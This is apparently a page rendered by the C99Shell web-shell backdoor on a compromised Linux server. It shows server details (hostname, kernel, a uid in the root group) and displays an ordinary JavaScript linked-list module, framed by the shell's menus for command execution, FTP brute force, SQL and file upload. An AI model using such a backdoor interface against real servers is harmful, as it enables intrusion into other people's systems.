!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/nodejs/yapool/   drwxr-xr-x
Free 28.62 GB of 117.98 GB (24.26%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.js (952 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
module.exports = Pool

function Pool () {
  this.length = 0
  this.head = null
  this.tail = null
}

Pool.prototype.add = function (data) {
  this.tail = new Item(data, this.tail, null)
  if (!this.head)
    this.head = this.tail
  this.length ++
}

Pool.prototype.remove = function (data) {
  if (this.length === 0)
    return

  var i = this.head.find(data)

  if (!i)
    return

  if (i === this.head)
    this.head = this.head.next

  if (i === this.tail)
    this.tail = this.tail.prev

  i.remove()
  this.length --
}

function Item (data, prev) {
  this.prev = prev
  if (prev)
    prev.next = this

  this.next = null
  this.data = data
}

Item.prototype.remove = function () {
  if (this.next)
    this.next.prev = this.prev
  if (this.prev)
    this.prev.next = this.next
  this.prev = this.next = this.data = null
}

Item.prototype.find = function (data) {
  return data === this.data ? this
  : this.next ? this.next.find(data)
  : null
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--